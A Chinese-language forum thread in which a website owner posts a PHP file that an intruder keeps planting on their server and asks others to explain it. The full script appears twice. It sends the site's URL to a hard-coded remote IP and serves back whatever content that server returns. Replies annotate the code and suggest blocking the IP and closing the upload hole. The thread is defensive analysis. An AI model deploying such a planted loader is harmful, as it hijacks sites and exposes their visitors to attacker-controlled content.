我網站好像被黑了,總有個SB天天來我網站根目錄放一個檔案,開啟後代碼如下:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("
Connection Error!
");
}
return $html;
}
?>
這什麼意圖?求高手分析下
回複討論(解決方案)
他把這個代碼放到你根目錄下,網站是不是訪問不了?
好像是他把你網站 原始地址 傳到他自己寫的一個方法裡面 用 host 參數接受 然後抓取你首頁的資訊吧
我網站沒異常(我還沒發現異常)
好像是他把你網站 原始地址 傳到他自己寫的一個方法裡面 用 host 參數接受 然後抓取你首頁的資訊吧
我網站沒異常(我還沒發現異常)
上面我的描述有問題,這個檔案不是放在更目錄,是放在根目錄的上一個目錄,
public_html 這個目錄裡面是網站的根目錄,他這個檔案和public_html放在同一個目錄,不知道他這樣對我的網站有什麼影響。 這SB隔天來次,已經刪了幾次了。
linux系統,目前使用權限設定為755,設定為644網站就打不開了,有什麼辦法不讓他上次檔案嗎?
$Remote_server."/index.html?host=".$host_name 這個地方他把你的網站地址傳過去 不知道幹什麼了 ,代碼在那個ip的伺服器上面 看不到。。。。。猜不來他要幹什麼。。。。。
伺服器 那方面的我不懂,等高手來把,
謝謝你
沒有異常?
set_time_limit(0); //永不逾時
header("Content-Type: text/html;charset=gb2312"); //指定瀏覽器字元集
$Remote_server = "http://122.114.126.160/"; //遠程網站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //構造當前頁的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //擷取瀏覽者的瀏覽器資訊
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //調用遠程網站
echo $Content_mb; //輸出遠程網站返回內容
exit(); //退出程式運行
function getHTTPPage($url) { //調用遠程網站函數
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //訪問遠程網站,你的url也傳過去了
if (empty($html)) {
exit("
Connection Error!
");
}
return $html;
}
至於對方做了什嗎?目前尚不清楚
如果是在本地開發環境,返回的是廣告,正常的頁面沒有了
如果是運行中的網站,那麼若沒異樣的話,就說明潛在的威脅是很大的(CSRF攻擊)
僅是出一點廣告,倒是也無所謂
不管怎麼樣,先把對方的IP給禁掉吧,配置你的伺服器:禁止122.114.126.160的IP訪問你的網站。
把你頁面的內容替換了。
先看看程式那裡有漏洞讓人上傳檔案比較好,漏洞不封以後還是很多問題的。
沒有異常?
set_time_limit(0); //永不逾時
header("Content-Type: text/html;charset=gb2312"); //指定瀏覽器字元集
$Remote_server = "http://122.114.126.160/"; //遠程網站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //構造當前頁的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //擷取瀏覽者的瀏覽器資訊
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //調用遠程網站
echo $Content_mb; //輸出遠程網站返回內容
exit(); //退出程式運行
function getHTTPPage($url) { //調用遠程網站函數
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //訪問遠程網站,你的url也傳過去了
if (empty($html)) {
exit("
Connection Error!
");
}
return $html;
}
至於對方做了什嗎?目前尚不清楚
如果是在本地開發環境,返回的是廣告,正常的頁面沒有了
如果是運行中的網站,那麼若沒異樣的話,就說明潛在的威脅是很大的(CSRF攻擊)
僅是出一點廣告,倒是也無所謂
-------------------------
感謝
不管怎麼樣,先把對方的IP給禁掉吧,配置你的伺服器:禁止122.114.126.160的IP訪問你的網站。
-------------------------
感謝
把你頁面的內容替換了。
先看看程式那裡有漏洞讓人上傳檔案比較好,漏洞不封以後還是很多問題的。
-------------------------
感謝
我猜測他是想放到你public_html檔案夾下seo.php,如果有檔案就是替換掉裡面的檔案
結果/打錯了,變成還在外面的檔案夾
我猜測他是想放到你public_html檔案夾下seo.php,如果有檔案就是替換掉裡面的檔案
結果/打錯了,變成還在外面的檔案夾
謝謝 有可能